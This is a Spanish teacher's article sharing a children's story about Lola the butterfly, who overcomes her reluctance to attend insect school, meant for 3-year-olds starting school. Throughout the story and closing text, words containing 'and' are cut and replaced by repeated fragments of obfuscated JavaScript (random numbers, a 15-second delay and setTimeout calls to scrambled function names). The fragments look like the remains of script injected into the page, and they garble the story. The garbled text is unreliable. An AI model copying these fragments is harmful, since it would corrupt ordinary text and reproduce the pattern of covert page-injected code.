CUENTO PARA EL PERIODO DE ADAPTACIÓN EN 3 AÑOS

Autora: María Isabel Gamero Pardo 

           En este artículo se expone un cuento que he utilizado con niños de 3 años del CEIP Nuestra Señora de Bótoa de Badajoz en el presente curso durante el Período de Adaptación. 

          Es un cuento que narra la historia de una pequeña mariposa que va a ir por primera vez a la escuela de los insectos. 

          Al principio no quiere ir porque no quiere separarse de mamá y papá pero luego, le gusta tanto que, decide ir todos los días para poder aprender y jugar con sus nuevos amigos y profesores. 

  

Había una vez una pequeña mariposa que vivía con su mamá y con su papá en una preciosa casa en mitad de un claro del bosque. 

Un día, la mamá la peinó con dos coletas, le puso un poco de colonia y le dijo que iba a ser su primer día de clases. 

Lola, que así se llamaba la mariposa, se puso muy contenta y revoloteaba un poco nerviosa de aquí para allá. 

  

           Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando llegó al colegio le gustaron los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes lunares negros de la Señorita Mariquita, las clases de música del maestro Grillo y dar vueltas con el profesor Cañafote.  

           En el arenero se encontró con su amiga la luciérnaga y con todos sus demás amiguitos del bosque.  

          Todo iba bien hasta que un día Lola le dijo a su mamá: 

-          Me parece que no voy a ir más a la escuela. Mejor me quedo en casa jugandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con mis muñecas. 

          Su mamá no lo podía creer: 

-          Pero si hasta ayer te encantaba el colegio… ¿cómo puede ser que hoy no quieras ir? 

-          Bueno, la escuela está bien pero me cansé: dijo Lola empezandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a hacer pucheros mientras jugaba con un palito a hacer dibujos en la tierra.


 

          En ese momento llegó su papá, se sentó a su lado y le preguntó: 

-          Dime preciosa, ¿qué te gustaría hacer cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando seas mayor? 

          Entonces la mariposita se olvidó del palito y toda entusiasmada le empezó a contar a su papá: 

-          Me gustaría pintar cuadros como la mamá de mi amiga luciérnaga, cocinar ricos dulces como mamá y tener un vestido de bailarina lleno de lentejuelas para poder bailar “la danza del duende Gominola”. 

-          Y todas esas cosas tan interesantes, ¿dónde las vas a aprender?: preguntó el papá. 

La mariposa se quedó pensandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando un ratito, después le brillaron los ojitos

y dijo sonriendo:

-          ¡Ah!… Ya entendí. Me parece… que voy a ir a la escuela todos los días.

Así que se preparó con su mejor vestido para poder ir a la escuela.

 

Entonces, su mamá le puso en la bolsita unas ricas galletitas caseras y un vasito de agua con tapa.

       

A la semana siguiente, fue su cumpleaños. En la escuela, la sorprendieron con una gran fiesta con globos y confeti.

La mamá le preparó la tarta y la vistió con un bonito vestido. El maestro Grillo le tocó con su violín música de Tschaikowsky y Lola pudo bailar “la danza del duende Gominola”.

Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando terminó, todos aplaudieron y le dieron un montón de besos. Y desde ese día Lola la mariposa no quiso faltar ni un solo día a la escuela.

 

         Los primeros días que el niño de 3 años pasa en el centro escolar son difíciles puesto que supone la separación de todo lo que conoce y acostumbrarse a unas rutinas, normas y personas nuevas para él, tanto adultos como niños.

          Por eso hemos de intentar, en la medida de lo posible, que esta transición se produzca de la forma menos traumática posible.

         Este cuento lo encontré navegandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en Internet y lo he adaptado al lenguaje de niños de 3 años, además he realizado los dibujos con los que se complementa el texto.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.